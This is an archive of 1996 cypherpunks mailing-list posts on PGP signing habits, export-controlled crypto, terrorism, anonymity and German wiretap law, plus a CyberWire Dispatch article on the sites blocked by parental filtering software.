>Could someone post a pointer to a FAQ that tells what to do if you loose
>your secret key file?  How can you regenerate your private key so that the
>userid number still matches the public key that has been distributed??

You can't. You're dead. Next time make a backup.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 17:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <199607030603.XAA01097@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:44 PM 7/2/96 -0700, Martin Minow wrote:

>It's not quite that bad. Here are a few (more or less strong) crypto
>products you might not know you have:
>
>1. Every Macintosh made since at least 1988 has a secure authentication
>   client module in the AppleShare Chooser dialog. When you use it to
>   connect to a remote server, it notes that the user information
>   is "two-way scrambled." (The server sends a random number challenge
>   that the client uses to encrypt the username and password. The
>   encrypted information is sent to the server.) All Macintosh systems
>   running System 7 or later have the corresponding server software.
>   What is interesting about this is that the encryption is completely
>   invisible to the user.

How did this affect the Macintosh's exportability?


>Note that the VCR companies have solved the vcr problem by receiving
>a timecode from a local television station -- making the problem
>invisible to the end user. We should be able to do the same with
>strong crypto.

I haven't bought a new VCR in a few years.  Is this real?  What prevented 
them from doing this 10 years ago?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Wed, 3 Jul 1996 09:27:16 +0800
To: cypherpunks@toad.com
Subject: Re: TRI_cks
In-Reply-To: <199607021418.OAA29985@pipe2.t2.usa.pipeline.com>
Message-ID: <Pine.HPP.3.91.960702225801.23746A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


>    "A Japanese engineer's box of tricks is helping detect 
>    forged banknotes."

Since the bulk of forged US$ (made in Syria and/or Iran?),
hundreds of millions, alledgedly are circulating in Russia,
will this bring down the Russian black market economy?
Or will they outlaw the Japanese box?

Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 3 Jul 1996 14:40:31 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607022343.TAA21050@darius.cris.com>
Message-ID: <Pine.LNX.3.94.960702230424.178A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 2 Jul 1996, David F. Ogren wrote:

> I've noticed recently that two PGP programmers (Mr. Zimmerman and Mr.
> Atkins) do not seem to PGP clearsign their messages to this list. In fact,
> a surprisingly small percentage of messages on the C-punk list are signed.
> This despite the fact that the average subscriber is at least literate in
> PGP.
> 
> Does anybody have any speculation on why this is?
> 
> Is it because people consider mundane mail unimportant enough to sign?

This is one reason.  I think that there are several other reasons:

 -- Someone may be using a machine at work or on a multiuser UNIX system which
    is untrusted and insecure.  In the case of a UNIX account, one could
    compose a message off-line and rz it using a term program, but that is a
    major hassle.

 -- Many email programs do not have support for PGP so signing a message often
    requires a lot of cutting and pasting.

 -- PGP may not work on the computer a person is using for Internet access or
    the system might be too slow to use PGP.
    
> 
> Is it because the members of this list are more concerned with encryption
> than authentication?

I think they are both equally important.  The point of public-key cryptography
is the ability to communicate with a person without having a secure channel to
exchange keys.  Once keys can be transmitted using the same medium used for the
encrypted traffic, it makes a MITM or denial-of-service attack much easier.
There has to be some out-of-band method to authenticate keys.  Without
authentication, a lot of the security that could be gained by using PK crypto
is lost.

> 
> Is it because most mail programs are not PGP aware?

I don't know of any mail programs that can use PGP (I know there are various
interfaces, sendmail wrappers, and other hacks, but I have yet to see a mailer
with an "Encrypt" or "Sign" option.

> 
> Is it because of the weaknesses in MD5?

Doubtful.  PGP authentication is better than no authentication.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdnnBLZc+sv5siulAQEIpAP/WesfBknwJeUnNIZzYtLkJkqR7hMu2jYz
9migOABikpYDwe0H8Dfn34ff3bab5xncoJ7M8l0HmvrISMjeFp9DpKXT0yJ0rk7a
HymHCGyGpJXjQ+snbLoyEQbB4DzcE+BjihSM2upmIMhQbH3paEagc41VwL+udfVA
EsWUux6Yato=
=8SiH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Wed, 3 Jul 1996 15:18:36 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607030350.XAA21619@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 02 23:47:42 1996
<snip>

> This is one reason.  I think that there are several other reasons:
> 
>  -- Someone may be using a machine at work or on a multiuser UNIX system
>  which
>     is untrusted and insecure.  In the case of a UNIX account, one
>  could
>     compose a message off-line and rz it using a term program, but that
>  is a
>     major hassle.
> 

 From the responses I received, this one may be a biggie.  And it's one that 
we can't do much about remedying.

<snip>

> > Is it because most mail programs are not PGP aware?
> 
> I don't know of any mail programs that can use PGP (I know there are
>  various
> interfaces, sendmail wrappers, and other hacks, but I have yet to see a
>  mailer
> with an "Encrypt" or "Sign" option.
> 

I'm beta testing a PGP aware mailer right now called Pronto Secure.  It 
will be a great program when its release.  Requires almost no PGP 
knowledge.  Everything is almost perfectly transparent to the user.

There is also Private Idado, of course, but that's a little harder to use, 
and doesn't have the features of a full-fledged mailer.

I figure that if strong encryption becomes legal to export from the US 
(making international standards easier to implement), we may see more 
programs like these.


David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMdntX+SLhCBkWOspAQGNgAf/VD/h7sVi/lhIJHSZMtJ262TIE7l++nRh
igjbX3PQeIIWrkWuilqarpuYMPwmOXB1OTn38MGkiwGENpAjsX7dS7+kyv/uh5IH
OY250DUMdiVW8YqYRknXo2lnOQDxtBWxO/aoDdJoFMRYHYaIBQGtAeg4WpbTjK19
OwdhtDSoXtY8EqdJJHctJcN1Ds7crJWI1v6vmR/I3AhvHMZZrmMuv1Dczsyn3aTj
P+wqspkp1oXztRQwP4VCEDpd7X2RGI74fICuJcf0+lRFoIH1o/gI50zLca+b/nq4
I3gn8Vo+LdUzmVpWNkrbW3YhMPyaIIYxFQ36BBT1A/KqliUvZooUgA==
=l17m
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 3 Jul 1996 18:14:54 +0800
To: John Deters <jad@dsddhc.com>
Subject: Re: The Net and Terrorism
In-Reply-To: <2.2.32.19960703005232.009d18e4@labg30>
Message-ID: <199607030700.AAA12965@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Do you still not accept that we have a world that contains people who exist
>in conditions that foster and breed terrorists?

of course. but what TCM's writing often seems to hide is a cynicism
about these conditions. "there's nothing we can do about it. buy
a bulletproof jacket and avoid crowed downtown areas". I'm saying
this cynicism and isolationism tends to make the problem worse,
not better. you clearly agree that we must find the reasons that
terrorists are being bred, and work to eliminate those conditions.
TCM apparently would feel that such a thing is a waste of time.

another thing that annoys me about the TCM slant or "spin" is the
pervasive connotation in his writing that terrorism is going
to get far worse in the future. if so, I would say that is because
world conditions that breed terrorists are getting far worse. he
seems to convey the idea that the world is a nonsensical place
where things, like increases in terrorism, occur for no particular
reason.

keep in mind that Ruby Ridge and Waco happened only a few years
ago. that's a nanosecond in cosmic time, yet the terrorist 
repercussions are being felt immediately. I would say its very
visceral evidene that terrorists are responding to events and
are not just madmen out for the fun of killing people.  there's
a bit of that of course..

>So, do you not accept that we have the environment right here that can breed
>violence and discontent?

it's a fatalistic way of putting it. yes I agree that such an environment
exists. no, I don't believe there is nothing that can be done about it.
no, I don't believe that everything that can be done about it has been
done about it. far from the case. my point in the essay.

>So your point here is one of *agreement* that human nature will produce
>psychological profiles of people who commit acts of terror.

no, I specifically reject that insanity and violence are "normal"
aspects of human behavior. merely because they have been around
for centuries does not prove they are normal, only how warped
the world has become such that abnormality is considered normal.

>Violence is here.  It's been present since recorded history.  We've gotten
>pretty good at it, actually.  I think the record speaks pretty clearly that
>violence continues to be a part of human behavior, despite any efforts made
>to stop it.

what your argument amounts to is essentially "well gosh, if there was
a way to get rid of violence we would have discovered it by now". not
if you are cynical, pessimistic, closeminded, and believe that violence
is simply a part of life.

>As I said above, we can reduce some of the breeding grounds, but we can not
>eradicate them all.  And if one were to conduct a study correlating racist
>attitudes with education with numbers of acts of terror, we might find a
>direct correlation.

no, but I believe you can eradicate virtually all the most extreme "swamplike
breeding grounds" that lead to the most insane terrorism such as
OKC. would OKC have happened if neither ruby ridge or Waco happened?
a compelling case can be made...

>The U.S. has a level of tolerance for diversity that I only recently came to
>appreciate.

I agree. but it's not optimal. it's fantastic compared to the rest of
the world, though, I agree. good anecdote.

>I am more than willing to agree with you that elimination of hatred and
>prejudice will go farther than any law enforcement measures to reduce
>terrorist acts.  However, my point, and I believe this is Tim's point, too,
>is that it will *never* eliminate these acts, and that there must be other
>ways of dealing with the problems that occur.

disagree. terrorism on the scale of OKC is largely unprecedented in
American history. I believe you are conflating degrees of violence.
and behind your and Tim's argument is that "there is a point at
which it is a waste of time to try to put any more work into 
eradicating terrorism, because it is inevitable". 

>Look at the Irish Question:  they want independance from a government they
>deem undesirable.  Look at the arabian terrorist bombings of Americans in
>Saudi Arabia, Lebanon, etc.:  they want to drive the U.S. Army out.

the point is that there is no physical strategic value from bombing
symbols.  I was making the point that terrorism is extremely symbolic
at the root. I'm not saying either warfare or terrorism is better
than the other. they're both very evil. but it seems to me that
people like TCM who equate terrorist activities with what governments
do are doing a grave disservice to civilization. you can find isolated
examples where governments behave like terrorist organizations, but
their primary purpose is to avoid such situations.

>You may think that you hold every answer to terrorism in your hand, that
>hugs and kisses before bedtime will make the evil monsters under the bed go
>away.

bzzzzzzt. what I am pointing out is that what Tim is essentially saying,
as you seem to be, that trying to combat terrorism is a waste of time
because it is a fact of life, is erroneous in my view. it is a common
libertarian argument that goes, "criminality is everywhere, so why try
to stop it?"  a rather juvenile ideology.  may you live in your reality and
see what it is like. hint: the current one we are living in is not
one in which the government does not try to fight terrorism.

    The point of Tim's essay was that, yes, the net can be used by the
>evil monsters, and yes, the evil monsters are here, and no, the evil
>monsters are not going away any time soon.  Why did you feel it necessary to
>try to slam his fairly well-researched and quite obvious conclusion?

because, from my past experience, it seems Timmy's wildest 
fantasies are always contained in the paragraphs
in which he says, "now, I'm not advocating this or anything...."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 3 Jul 1996 16:25:05 +0800
To: cypherpunks@toad.com
Subject: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <v01510104adffb06725c5@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





CyberWire Dispatch // Copyright (c) 1996 //


Jacking in from the "Keys to the Kingdom" Port:

Washington, DC -- This is a tale of broken codes, betrayal of a social
contract, morality run amuck, and a kind of twisted John Le Carre meets
the Crying Game encounter.

For a range of companies producing so-called "blocking software"
designed to keep kids from accessing undesirable material in
cyberspace, the road to such a moral high ground turns out to be a
slippery slope. These programs, spawned in the wake of the hysteria
over how much porn Junior might find on the Net, have chosen the role
of online guardians. The resulting array of applications, including
names like SurfWatch, CyberPatrol, NetNanny and CyberSitter, acts as a
kind of digital moral compass for parents, educators, paranoid
Congressmen, and puritanical PTAs.

Install the programs and Junior can't access porn. No fuss, no muss, no
bother. "Parental empowerment" is the buzzword. Indeed, it was these
programs that helped sway the three-judge panel in Philly to knock down
the Communications Decency Act as unconstitutional.

But there's a darker side. A close look at the actual range of sites
blocked by these apps shows they go far beyond just restricting
"pornography." Indeed, some programs ban access to newsgroups
discussing gay and lesbian issues or topics such as feminism. Entire
*domains* are restricted, such as HotWired. Even a web site dedicated
to the safe use of fireworks is blocked.

All this might be reasonable, in a twisted sort of way, if parents were
actually aware of what the programs banned. But here's the rub: Each
company holds its database of blocked sites in the highest security.
Companies fight for market share based on how well they upgrade and
maintain thhat blocking database. All encrypt that list to protect it
from prying eyes --- until now.

Dispatch received a copy of each of those lists. With the codes
cracked, we now held the keys to the kingdom: the results of hundreds,
no, thousands of manhours of smut-surfing dedicated to digging up the
most obscene and pornographic sites in the world. And it's in our
possession. But it didn't come easy...



I'd just spent the better part of a muggy Washington night knocking
back boilermakers in an all-night Georgetown bistro waiting for a
couple of NSA spooks that never showed.

I tried to stumble to the door and an arm reached out and gently shoved
me back to my table. At the end of that arm was a leggy redhead; she
had a fast figure and even faster smile. There was a wildness about her
eyes and I knew it was the crank. But something else wasn't quite
right.

As I fought with my booze-addled brain, struggling to focus my eyes, I
noticed her adam's apple.

"Who needs this distraction," I thought, again wondering what kind of
comic hellhole I fell into that put me in the middle of yet another
bizarre adventure.

"I have something for you," she/he deadpanned. Red had the voice of a
baritone and a body you could break bricks on.

No introductions, no chit-chat. This was strictly business and for a
moment I thought I was being set up by the missing spooks. The hair on
the back of my neck stood on end.

Out from Red's purse came a CD-ROM. She/he shoved the jewel box across
the table. It was labeled: "The keys to the kingdom." What the fuck was
this? I must be on Candid Camera.

Red anticipated my question: "I can't say; I won't say. Just take it,
use it. That's all I'm supposed to say." And she/he got up, stretched
those mile-high legs, and loped into the night.

The next morning I slipped the disc in my Mac and the secret innards of
the net-blocking programs flowed across my screen. CyberPatrol,
SurfWatch, NetNanny, CyberSitter. Their encrypted files -- thousands
and thousands of web pages and newsgroups with the best porn on the
Net. Not surprising, really -- the net-blocking software companies
collect smut-reports from customers and pay college kids to grope
around the Net for porn.

This shit was good. Even half-awake with a major league hangover, I
could tell the smut-censoring software folks would go ballistic over
Red's delivery. To Junior, these lists would be a one-stop-porn-shop.

Susan Getgood from CyberPatrol emphasized this to Dispatch. She said:
"The printout of the 'Cybernot' list never *ever* leaves this
building. It's under lock and key... Once it left this building we'd
see it posted on the Net tomorrow. It would be contributing to the
problem it was designed to solve -- [it would be] the best source of
indecent material anywhere."

She's right. A recent version of CyberPatrol's so-called "Cybernot"
list featured 4,800 web sites and 250 newsgroups. That's a lot of
balloon-breasted babes.

CyberPatrol is easily the largest and most extensive smut-blocker. It
assigns each undesirable web site to at least one and often multiple
categories that range from "violence/profanity" to "sexual acts,"
"drugs and drug culture," and "gross depictions."

The last category, which includes pix of syphilis-infected monkeys and
greyhounds tossed in a garbage dump, has some animal-rights groups in a
tizzy. They told Dispatch that having portions of their sites labeled
as "gross depictions" is defamatory -- and they intend to sue the bastards.

"We're somewhat incensed," said Christina Springer, managing director
of Envirolink, a Pittsburgh-based company that provides web space to
environmental and animal-rights groups. "Pending whether [our attorney]
thinks we have a case or not, we will actually pursue legal actions
against CyberPatrol."

Said Springer: "Animal rights is usually the first step that children
take in being involved in the environment. Ignoring companies like Mary
Kay that do these things to animals and allowing them to promote
themselves like good corporate citizens is a 'gross depiction.'"

CyberPatrol's Getgood responded: "We sent a note back to [the
Envirolink director] and haven't heard back from him. Apparently he's
happy with our decision. I still think the monkey with its eye gouged
out is a gross depiction."

Rick O'Donnell from the Progress and Freedom Foundation is amazed that
Envirolink would threaten legal action. "It's new technology. It's
trial-and-error... There will be glitches."

"Filtering software firms have the right to choose whatever site they
want to block since it's voluntary... Government-imposed [blocking] is
censorship. Privately-chosen is editing, discernment, freedom of
choice," he said.

The Gay and Lesbian Alliance Against Defamation (GLAAD) is as unhappy
as Envirolink. When Dispatch spoke with GLAAD's Alan Klein and rattled
off a list of online gay and lesbian resources that the overeager
blocking software censored, he was horrified.

"We take this very seriously," said Klein. "Lesbian and gay users
shouldn't be treated as second-class users on the Net. These companies
need to understand that they can't discriminate against lesbian and gay
users... We will take an active stance on this."

CyberPatrol blocks a mirror of the Queer Resources Directory (QRD) at
http://qrd.tcp.com/ and USENET newsgroups including clari.news.gays
(home to AP and Reuters articles) alt.journalism.gay-press, and
soc.support.youth.gay-lesbian-bi, Red's list revealed. CyberSitter also
bans alt.politics.homosexual and the QRD at qrd.org. NetNanny blocks
IRC chatrooms such as #gaysf and #ozgay, presumably discussions by San
Francisco and Australian gays.

GLAAD told Dispatch they were especially surprised that CyberPatrol
blocked gay political and journalism groups since the anti-defamation
organization has a representative on the "Cybernot" oversight
committee, which meets every few weeks to set policies. However,
Dispatch learned the oversight group never actually sees the previously
top-secret "Cybernot" list. They don't know what's *really* banned.

Why should alt.journalism.gay-press, for instance, be blocked? There's
no excuse for it, said GLAAD's Klein. "A journalism newsgroup shouldn't
be blocked. It's completely unacceptable... This is such an important
resource for gay youth around the country. If it weren't for the Net,
maybe thousands of gay teens around the country would not have come out
and known there were resources for them."

He's right. Even a single directory at the QRD, such as the Health/AIDS
area, has vital information from the Centers for Disease Control and
Prevention, the AIDS Book Review Journal, and AIDS Treatment News.

In response to Dispatch's questions about these sites being blocked,
CyberPatrol's Getgood said: "It doesn't block materials based on sexual
preference. If a site would be blocked if there are two heterosexuals
kissing, we'd block it if there are two homosexuals kissing."

Fine, but we're not talking about gay porn here. What about some of the
political groups? "We'll look into it," said Getgood.

NetNanny is just as bad, argues GLAAD's Loren Javier, who called the
software's logging features "dangerous." (The program lets parents
review what their kids have been doing online.) "If you have someone
who has homophobic parents, it gives them a way of keeping tabs on
their kid and possibly making it worse for their children," said
Javier.

Worse yet, CyberPatrol doesn't store the complete URL for blocking --
it abbreviates the last three characters. So when it blocks the
"CyberOS" gay video site by banning http://www.webcom.com/~cyb,
children are barred from attending the first "Cyber High School" at
~cyberhi, along with 16 other accounts that start with "cyb." In
attacking Shawn Knight's occult resources at
http://loiosh.andrew.cmu.edu/~sha, the program cuts off 23 "sha"
accounts at Carnegie Mellon University, including Derrick "Shadow"
Brashear's web page on Pittsburgh radio stations.

The geeks at CMU's School of Computer Science had fun with this. In
March they cobbled together a "Banned by CyberPatrol" logo that they
merrily added to their blocked homepages:
http://nut.compose.cs.cmu.edu/images/ban3.gif

NetNanny also has a fetish for computer scientists. For instance, it
blocks all mailing lists run out of cs.colorado.edu -- including such
salacious ones as parallel-compilers, systems+software, and
computer-architecture. Guess those computer geeks talk blue when
they're not pumping out C code.

Dispatch asked Getgood why CyberPatrol blocks access to other seemingly
unobjectionable web sites including the University of Newcastle's
computer science department, the Electronic Frontier Foundation's
censorship archive, and the League for Programming Freedom at MIT, a
group that opposes software patents.

Getgood replied via email: "I'll forward this message to our Internet
Research Supervisor and have her look into the specific sites you
mention..." She said there is a "fair process" for appeals of
unwarranted blocking.

But CyberPatrol doesn't stop at EFF and MIT. It also goes after gun and
Second Amendment pages including http://www.shooters.com/,
http://www.taurususa.com/, http://206.31.73.39/, and
http://www-199.webnexus.com/nra-sv/, according to a recent "Cybernot"
list.

The last site is run by the National Rifle Association (NRA) Members'
Council of Silicon Valley, and bills itself as "the NRA's grass roots
political action and education group for the San Jose, Santa Clara,
Milpitas, and surrounding areas."

Peter Nesbitt, an air-traffic controller who volunteers as part of the
Silicon Valley NRA group, says "it's terrible" that CyberPatrol blocks
gun-rights web sites. "The people who are engaging in censoring gun
rights or gun advocates groups are the opposition who want to censor us
to further their anti-gun agenda."

An unlikely bedfellow, the National Organization of Women (NOW) ain't
too pleased neither. Of course, they're unlikely to feel any other way
-- CyberSitter blocks their web site at www.now.org.

Not to be outdone, NetNanny blocks feminist newsgroups while
CyberSitter slams anything dealing with "bisexual" or "lesbian"
themes." CyberPatrol beats 'em all by going after alt.feminism,
alt.feminism.individualism, soc.feminism, clari.news.women,
soc.support.pregnancy.loss, alt.homosexual.lesbian, and
soc.support.fat-acceptance.

Dispatch reached Kim Gandy, NOW's executive vice president, at home as
she was preparing dinner for her 3-year old daughter. Gandy charged
the companies with "suppressing information" about feminism. She said:
"As a mother myself, I'd like to limit my kids from looking at
pornography but I wouldn't want my teenage daughter [prevented] from
reading and participating in online discussions of important current
issues relating to womens rights."

An indignant NOW? Let 'em rant, says CyberSitter's Brian Milburn. "If
NOW doesn't like it, tough... We have not and will not bow to any
pressure from any organization that disagrees with our philosophy."

Unlike the others, CyberSitter doesn't hide the fact that they're
trying to enforce a moral code. "We don't simply block pornography.
That's not the intention of the product," said Milburn. "The majority
of our customers are strong family-oriented people with traditional
family values. Our product is sold by Focus on the Family because we
allow the parents to select fairly strict guidelines." (Focus on the
Family, of course, is a conservative group that strongly supports the
CDA.)

Dispatch particularly enjoyed CyberSitter's database, which reads like a
fucking how-to of conversations the programmers thought distasteful:

[up][the,his,her,your,my][ass,cunt,twat][,hole]
[wild,wet,net,cyber,have,making,having,getting,giving,phone][sex...]
[,up][the,his,her,your,my][butt,cunt,pussy,asshole,rectum,anus]
[,suck,lick][the,his,her,your,my][cock,dong,dick,penis,hard on...]
[gay,queer,bisexual][male,men,boy,group,rights,community,activities...]
[gay,queer,homosexual,lesbian,bisexual][society,culture]
[you][are][,a,an,too,to][stupid,dumb,ugly,fat,idiot,ass,fag,dolt,dummy]

CyberSitter's Milburn added: "I wouldn't even care to debate the issues
if gay and lesbian issues are suitable for teenagers. If they [parents]
want it they can buy SurfWatch... We filter anything that has to do
with sex. Sexual orientation [is about sex] by virtue of the fact that
it has sex in the name."

That's the rub. It's a bait and switch maneuver. The smut-censors say
they're going after porn, but they quietly restrict political speech.

All this proves is that anyone setting themselves up as a kind of
digital moral compass quickly finds themselves plunged into a kind of
virtual Bermuda Triangle, where vertigo reigns and you hope to hell you
pop out the other side still on course. Technology is never a
substitute for conscience.

And for anyone thinking of making an offer for the disc, forget it.
Like a scene out of Mission Impossible, we came back from a late-night
binge to find the CD-ROM melted and the drive smoldering. Thank God
there's a backup somewhere. Red, get in touch.

Meeks and McCullagh out...

-------------

While Brock N. Meeks (brock@well.com) did the heaving drinking for this
article, Declan B. McCullagh (declan@well.com) did the heavy reporting.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Firebeard <stend@grendel.austin.texas.net>
Date: Wed, 3 Jul 1996 17:07:05 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607022343.TAA21050@darius.cris.com>
Message-ID: <199607030559.AAA17707@grendel.austin.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> Mark M writes:

MM> On Tue, 2 Jul 1996, David F. Ogren wrote:

DO> In fact, a surprisingly small percentage of messages on the C-punk
DO> list are signed.  This despite the fact that the average
DO> subscriber is at least literate in PGP.
DO> 
DO> Does anybody have any speculation on why this is?
DO> 
DO> Is it because people consider mundane mail unimportant enough to
DO> sign?

MM> This is one reason.  I think that there are several other reasons:

>>  Is it because most mail programs are not PGP aware?

MM> I don't know of any mail programs that can use PGP (I know there
MM> are various interfaces, sendmail wrappers, and other hacks, but I
MM> have yet to see a mailer with an "Encrypt" or "Sign" option.

	Well, I'd say that the emacs/Gnus/mailcrypt combo is PGP aware
- - properly installed, emacs has encrypt, sign, and remail menu items.
I don't use it routinely mainly because I haven't set things up to
propogate my key, so signing articles would be kind of useless.

- -- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited solicitations will be proofread for a US$100/page fee.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMdoLmC+2V9GxYWz1AQEwMwf+MKji8AGIfhmLCkANxjzvqc209yLlGEAz
J1LIXuN4+2M7fVPPKmsg6jiUT0k4G0IpXJMF7bbolDYd1PjEAlJiRhlCa7D8GJbz
w21cE2IN8qvJZfzZrncfsOlElOzQXBbi2DpyF1xPzxRvOodwGBT80iVOQR6K0jZO
wficMfAUmItp7y5+W+L+y2rsAaQ+gkhuLAyKwe7C4n7eYW+2Pqh7CvJT/Ob7nlTD
OgrR8i9m6cl6G5JsJAcb/FYcRzyr8+k8BzvryWqiALS0QGwv8lzbbP0HS9171Fu7
vAXcilhV4WNgG7WVBcElIYlgGW5yiaUxq64O91QVQPfrR283c3APTg==
=rVPk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 3 Jul 1996 16:13:19 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607022343.TAA21050@darius.cris.com>
Message-ID: <199607030500.BAA26348@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> Atkins) do not seem to PGP clearsign their messages to this list. In fact, 
> a surprisingly small percentage of messages on the C-punk list are signed. 
> This despite the fact that the average subscriber is at least literate in 
> PGP.
> 
> Does anybody have any speculation on why this is?

I'd say this is it:

> Is it because most mail programs are not PGP aware?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 3 Jul 1996 16:18:46 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <199607021730.KAA18852@mail.pacifier.com>
Message-ID: <9607030513.AA24821@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 08:28 PM 7/1/96 -0700, David Wagner wrote:
> 
> >If folks have better ideas for how to achieve really good recipient
> >anonymity, I hope they'll speak up!
> 
> 
> (BTW, for a few years a company called "Planet Connect" has been providing 
> FIDOnet data feeds, although they use the older-style, large antenna 
> systems, and their data rate is 19.2kbps, not even close to enough for 
> Internet service.)
> 
	There is another small company (used to be called Pagesat and
now called NCIT) that provides a 115.2 kb compressed (gzip) forward
error corrected feed of the entire USENET in near real time over a Ku band
satellite - not big ugly 8-10 foot dish C band, but a 1 meter VSAT style
fixed offset fed Ku dish (bigger than DSS - more the size of Primestar).
(Satellite is K2 and soon will be GE-1).

	Pagesat/NCIT markets this service primarily to medium and small
size ISPs, but it is available to individuals willing to pay $400/yr
for the service and about $600-$1000 for the hardware.


						Dave Emery
						die@die.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Wed, 3 Jul 1996 11:56:28 +0800
To: llurch@networking.stanford.edu
Subject: Re: Info on alleged new German digital wiretapping law?
In-Reply-To: <autopost.836344076.1489@ulf.mali.sub.org>
Message-ID: <m0ubEel-00006nC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:

>None of the Europeans I ran into at today's SAFE conference had even heard
>of the legislation decried at
>
> http://fight-censorship.dementia.org/fight-censorship/dl?num=3027
>
>and in alt.fan.ernst-zundel. What's up?

The report is correct.

The mainstream press has completely ingnored the wiretap legislation,
probably because it is part of the long-awaited new telecommunications
law to end the Telekom monopoly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Wed, 3 Jul 1996 11:54:43 +0800
To: daw@cs.berkeley.edu
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <autopost.836344072.1464@ulf.mali.sub.org>
Message-ID: <m0ubEvG-00006nC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>alt.anonymous.messages is not an ideal message pool-- it is a hack.
>(Granted, it *is* a really cool, clever, and practically useful hack.)

I agree that alt.anonymous.messages is not perfect. But if you
download all articles and don't post to alt.anonymous.messages
without using a remailer, the only real threat are denial of
service attacks with cancel messages etc.

>If folks have better ideas for how to achieve really good recipient
>anonymity, I hope they'll speak up!

I think a DC+ net would achieve the same degree of anonymity more
efficiently. (It's not trivial to estimate the traffic caused by
a remailer net as proposed by Ian, so I may be wrong there.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Wed, 3 Jul 1996 20:02:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: SAFE Forum--some comments
In-Reply-To: <adfea59d02021004104f@[205.199.118.202]>
Message-ID: <9607030224.aa08663@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


Tim sez... 
> And here I'll comment on Ken Bass's excellent comments (there were many
> excellent points). Bass is a D.C.-area lawyer with the prestigious Venable
> law firm (the venerable Venable firm?), and a former Reagan Administration
> official.
> 
> He pointed out that the driving force for crypto policy is probably the
> _law enforcement_ camp, not the _intelligence agency_ camp. And that the
> NSA is regretting the ITAR stuff, as it has sparked an "arms race" to
> develop stronger crypto. Bass noted that people now equate permission to
> export with weakness, and that had the U.S. not restricted exports, users
> probably would've been "fat, dumb, and happy" to keep using breakable
> crypto.

Bass is fun to drink with too.  His web site is under attack and he needs a
hacker if anyone is interested in doing any pro bono community service work.
Bruce's comments on the robustness of foreign, (i.e. unescrowed) encryption
were very enlightening as well.  It was good to see all the old CDT hands, and
the munchies Gilmore bought went quickly at the Godwin table.  Mike makes a
substantial argument that the Supreme Court will not overturn ACLU et. al. v.
Reno, but I wouldn't pretend to speak for him.  And Cindy Cohn is the point 
man in the Super Bowl long range recon team, Bernstein v. DoS.

